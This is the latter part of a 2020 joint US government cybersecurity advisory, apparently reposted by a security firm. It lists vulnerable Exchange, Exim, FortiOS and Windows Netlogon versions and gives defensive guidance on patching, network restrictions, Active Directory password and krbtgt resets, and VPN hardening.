<p>&nbsp;</p>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”><a href=”https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688″>Microsoft Security Advisory for CVE-2020-0688</a></td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-10149″>CVE-2019-10149</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Exim versions 4.87–4.91</li>
</ul>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”><a href=”https://www.exim.org/static/doc/security/CVE-2019-10149.txt”>Exim page for CVE-2019-10149</a></td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2018-13379″>CVE-2018-13379</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>FortiOS 6.0: 6.0.0 to 6.0.4</li>
<li>FortiOS 5.6: 5.6.3 to 5.6.7</li>
<li>FortiOS 5.4: 5.4.6 to 5.4.12</li>
</ul>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”><a href=”https://www.fortiguard.com/psirt/FG-IR-18-384″>Fortinet Security Advisory: FG-IR-18-384</a></td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-1472″>CVE-2020-1472</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>
<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>
<li>Windows Server 2012</li>
<li>Windows Server 2012 (Server Core installation)</li>
<li>Windows Server 2012 R2</li>
<li>Windows Server 2016</li>
<li>Windows Server 2019</li>
<li>Windows Server 2019 (Server Core installation)</li>
<li>Windows Server, version 1903&nbsp; (Server Core installation)</li>
<li>Windows Server, version 1909&nbsp; (Server Core installation)</li>
<li>Windows Server, version 2004&nbsp;&nbsp; (Server Core installation)</li>
</ul>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”>
<p><a href=”https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472″>Microsoft Security Advisory for CVE-2020-1472</a></p>

<p>&nbsp;</p>
</td>
</tr>
</tbody>
</table>

<p>&nbsp;</p>

<ul>
<li>Follow Microsoft’s <a href=”https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc”>guidance</a> on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.</li>
<li>If appropriate for your organization’s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on <a href=”https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices”>SMB Security Best Practices</a> for more information.</li>
<li>Implement the prevention, detection, and mitigation strategies outlined in:
<ul>
<li>CISA Alert <a href=”https://us-cert.cisa.gov/ncas/alerts/TA15-314A”>TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance</a>.</li>
<li>National Security Agency Cybersecurity Information Sheet <a href=”https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/”>U/OO/134094-20 – Detect and Prevent Web Shells Malware</a>.</li>
</ul>
</li>
<li>Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.</li>
<li>Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.</li>
<li>Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from <code>PROGRAMFILES</code>, <code>PROGRAMFILES(X86)</code>, and <code>WINDOWS</code> folders. All other locations should be disallowed unless an exception is granted.</li>
<li>Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.</li>
</ul>

<h4>Comprehensive Account Resets</h4>

<p>For accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT “Golden Tickets” may be required, and Microsoft has released specialized <a href=”https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts”>guidance</a> for this. Such a reset should be performed very carefully if needed.</p>

<p>If there is an observation of <a href=”https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472″>CVE-2020-1472</a> Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premise—as well as in Azure-hosted—AD instances.</p>

<p>Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.</p>

<p>It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.</p>

<ol>
<li>Create a temporary administrator account, and use this account only for all administrative actions</li>
<li>Reset the Kerberos Ticket Granting Ticket <code>(krbtgt</code>) password;[<a href=”https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password”>1</a>] this must be completed before any additional actions (a second reset will take place in step 5)</li>
<li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li>
<li>&nbsp;Reset all account passwords (passwords should be 15 characters or more and randomly assigned):
<ol type=”a”>
<li>User accounts (forced reset with no legacy password reuse)</li>
<li>Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])</li>
<li>Service accounts</li>
<li>Directory Services Restore Mode (DSRM) account</li>
<li>Domain Controller machine account</li>
<li>Application passwords</li>
</ol>
</li>
<li>Reset the<code> krbtgt</code> password again</li>
<li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li>
<li>Reboot domain controllers</li>
<li>Reboot all endpoints</li>
</ol>

<p>The following accounts should be reset:</p>

<ul>
<li>AD Kerberos Authentication Master (2x)</li>
<li>All Active Directory Accounts</li>
<li>All Active Directory Admin Accounts</li>
<li>All Active Directory Service Accounts</li>
<li>All Active Directory User Accounts</li>
<li>DSRM Account on Domain Controllers</li>
<li>Non-AD Privileged Application Accounts</li>
<li>Non-AD Unprivileged Application Accounts</li>
<li>Non-Windows Privileged Accounts</li>
<li>Non-Windows User Accounts</li>
<li>Windows Computer Accounts</li>
<li>Windows Local Admin</li>
</ul>

<h4>VPN Vulnerabilities</h4>

<p>Implement the following recommendations to secure your organization’s VPNs:</p>

<ul>
<li><strong>Update VPNs, network infrastructure devices, and devices</strong> being used to remote into work environments with the latest software patches and security configurations. See CISA Tips <a href=”https://us-cert.cisa.gov/ncas/tips/ST04-006″>Understanding Patches and Software Updates</a> and <a href=”https://us-cert.cisa.gov/ncas/tips/ST18-001″>Securing Network Infrastructure Devices</a>. Wherever possible, enable automatic updates.</li>
<li><strong>Implement MFA on all VPN connections to increase security</strong>. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips <a href=”https://us-cert.cisa.gov/ncas/tips/ST04-002″>Choosing and Protecting Passwords</a> and <a href=”https://us-cert.cisa.gov/ncas/tips/ST05-012″>Supplementing Passwords</a> for more information.</li>
</ul>

<p>Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:</p>

<ul>
<li><strong>Audit </strong>configuration and patch management programs.</li>
<li><strong>Monitor </strong>network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).</li>
<li><strong>Implement</strong> MFA, especially for privileged accounts.</li>
<li><strong>Use</strong> separate administrative accounts on separate administration workstations.</li>
<li><strong>Keep </strong><a href=”https://us-cert.cisa.gov/ncas/tips/ST04-006″>software up to date</a>. Enable automatic updates, if available.</li>
</ul>
<h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”http://www.fbi.gov/contact-us/field”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href=”https://us-cert.cisa.govmailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”https://us-cert.cisa.govmailto:Central@cisa.dhs.gov”>Central@cisa.dhs.gov</a>.</p>

<h3>Resources</h3>

<ul>
<li>APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations – <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-283a”>https://us-cert.cisa.gov/ncas/alerts/aa20-283a</a></li>
<li>CISA Activity Alert CVE-2019-19781 – <a href=”https://us-cert/cisa.gov/ncas/alerts/aa20-031a”>https://us-cert/cisa.gov/ncas/alerts/aa20-031a</a></li>
<li>CISA Vulnerability Bulletin – <a href=”https://us-cert/cisa.gov/ncas/bulletins/SB19-161″>https://us-cert/cisa.gov/ncas/bulletins/SB19-161</a></li>
<li>CISA Current Activity – <a href=”https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688″>https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688</a></li>
<li>Citrix Directory Traversal Bug (CVE-2019-19781) – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-19781″>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</a></li>
<li>Microsoft Exchange remote code execution flaw (CVE-2020-0688) – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-0688″>https://nvd.nist.gov/vuln/detail/CVE-2020-0688</a></li>
<li>CVE-2018-13379 – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2018-13379 “>https://nvd.nist.gov/vuln/detail/CVE-2018-13379</a></li>
<li>CVE-2020-1472 – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-1472″>https://nvd.nist.gov/vuln/detail/CVE-2020-1472</a></li>
<li>CVE 2019-10149 – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-10149”>https://nvd.nist.gov/vuln/detail/CVE-2019-10149</a></li>
<li>NCCIC/USCERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance – <a href=”https://us-cert.cisa.gov/ncas/alerts/TA15-314A “>https://us-cert.cisa.gov/ncas/alerts/TA15-314A</a></li>
<li>NCCIC/US-CERT publication on SMB Security Best Practices – <a href=”https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices”>https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices</a><br />
&nbsp;</li>
</ul>

<div class=”special_container text-align-center”>&nbsp;</div>

<div class=”special_container text-align-center”><strong><em>DISCLAIMER</em></strong></div>

<div class=”special_container”>&nbsp;</div>

<div class=”special_container”>
<p><em>This information is provided “as is” for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p>

<p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p>
</div>

<p><o:p></o:p></p>
<h3>References</h3>
<ul> <li><a href=”https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password”>[1] Microsoft: AD Forest Recovery – Resetting the krbtgt password</a></li> </ul> <h3>Revisions</h3>
<ul> <li>October 22, 2020: Initial Version</li> <li>November 17, 2020: Added U.S. Heat Map of Activity</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy &amp; Use</a> policy.</p>

</div>

For Emergency Cyber Security Incident Response please email RedTeam@DefendEdge.com